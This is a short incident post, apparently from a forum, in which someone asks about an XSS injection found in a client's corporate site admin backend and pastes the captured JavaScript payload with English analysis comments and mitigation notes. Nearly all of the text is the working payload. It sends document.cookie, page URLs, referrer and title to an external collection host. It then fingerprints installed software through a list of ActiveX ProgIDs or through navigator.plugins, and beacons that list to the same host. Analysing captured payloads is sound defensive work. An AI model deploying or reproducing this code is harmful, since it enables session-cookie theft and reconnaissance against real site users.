有个客户的企业网站后台被 XSS 了，特有此问。
// Captured payload (as found injected in the site's admin backend).
// A detached Image is used as the transport: assigning .src issues a GET
// to the remote endpoint without any visible DOM change.
var x=new Image();
try
{
var myopener='';
// Best-effort read of the opener window's URL; cross-origin access throws,
// which the empty catch below silently discards.
myopener=window.opener && window.opener.location ? window.opener.location : '';
}
catch(err)
{
}
// Beacon to http://xss.re/XSS/ (id=2603). Every value below is sent as a
// query parameter: current URL, top-frame URL, document.cookie, the opener
// URL, referrer and page title. document.cookie being readable here means
// the session cookies of the affected backend were not marked HttpOnly.
// Detection: outbound requests to that host carrying `diy[cookie]=` in the
// query string; mitigation: HttpOnly session cookies, output encoding in
// the backend templates, and a CSP restricting img-src/connect-src.
x.src='http://xss.re/XSS/?do=api&act=r&id=2603&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape
(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);var activexa = new Array(
// Fingerprint list for the IE branch: "display name|ActiveX ProgID|classID".
// Each ProgID is probed with new ActiveXObject() in checkobj(); a hit
// reveals installed software (browser plugins, banking/IM/AV products).
"Flash Player 8|ShockwaveFlash.ShockwaveFlash.8|classID",
"Flash Player 9|ShockwaveFlash.ShockwaveFlash.9|classID",
"360Safe|360SafeLive.Update|classID",
"Alibaba User(AliEdit)|Aliedit.EditCtrl|classID",
"CMB Bank|CMBHtmlControl.Edit|classID",
"Apple IPOD USER|IPodUpdaterExt.iPodUpdaterInterface|classID",
"Apple iTunes|iTunesAdmin.iTunesAdmin|classID",
"JRE 1.7|JavaWebStart.isInstalled.1.7.0.0|classID",
"JRE 1.6(WebStart)|JavaWebStart.isInstalled.1.6.0.0|classID",
"KMPlayer|KMPlayer.TKMPDropTarget|classID",
"KingSoft Word(�ʰ�)|KSEngine.Word|classID",
"Windows live Messanger|Messenger.MsgrObject|classID",
"Nero|NeroFileDialog.NeroFileDlg|classID",
"Nokia Cellphone|NokiaCL.PhoneControl|classID",
"PPlayer|PPlayer.XPPlayer|classID",
"Tencent QQ|Qqedit.PasswordEditCtrl|classID",
"QuickTime|QuickTime.QTElementBehavior|classID",
"Symantec Anti-Virus|Symantec.stInetTransferItem|classID",
"Xunlei|XunLeiBHO.ThunderIEHelper|classID"
);
// IE branch of the software fingerprint (selected by MyPlusCheck()).
// Walks the activexa table, probes each ProgID via checkobj(), and sends
// the list of detected products to the same remote endpoint together with
// the page URL, cookies, referrer and title.
function iescan(){
var mytmp;
var plus;
var bar;
var x=new Image();
// `i` is assigned without var, so it becomes an implicit global.
for (i=0; i<activexa.length; i++){
mytmp = activexa[i].split('|');
// mytmp[1] is the ProgID column of the table entry.
if ( checkobj(mytmp[1]) == true ){
plus+="|"+mytmp[0]+"<br>";

}
}
bar = escape(plus);
// Second beacon: a=cplus marks this as the plugin report; the `plus`
// parameter carries the detected product names.
x.src='http://xss.re/XSS/?do=api&act=r&id=2603&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(document.myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);
}
// Returns true when an ActiveX control with the given ProgID can be
// instantiated (i.e. the corresponding software is installed), false when
// the constructor throws. Only meaningful in browsers exposing
// ActiveXObject; elsewhere the reference itself throws and false results.
function checkobj(objName){
try {
var Obj = new ActiveXObject(objName);
return true;
} catch (e){
return false;
}
}
- //-------------
// Non-IE branch of the software fingerprint: enumerates navigator.plugins
// (name and filename of each entry) and sends the list to the remote
// endpoint with the same page/cookie/referrer/title fields as above.
function check_plus() {
var plus = "";
var bar = "";
var b=new Image();
var num_of_plugins = navigator.plugins.length;
for (var i=0; i < num_of_plugins; i++) {
plus+= navigator.plugins[i].name+" | "+ navigator.plugins[i].filename +"<br>";
}
bar = escape(plus);
b.src='http://xss.re/XSS/?do=api&act=r&id=2603&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);
}
// Dispatches to the browser-specific fingerprint routine.
// `!+[1,]` is a browser-sniffing trick: it is truthy only in engines where
// the trailing comma makes [1,] a two-element array (old IE), so iescan()
// is the IE path and check_plus() covers everything else.
function MyPlusCheck() {
if(!+[1,]){
iescan();
}else{
check_plus();
}
}
// Delayed start (3 s) of the fingerprint phase; the cookie beacon above has
// already fired synchronously at load. The string form of setTimeout is
// evaluated as code, which a CSP without 'unsafe-eval' would block.
setTimeout("MyPlusCheck()", 3000);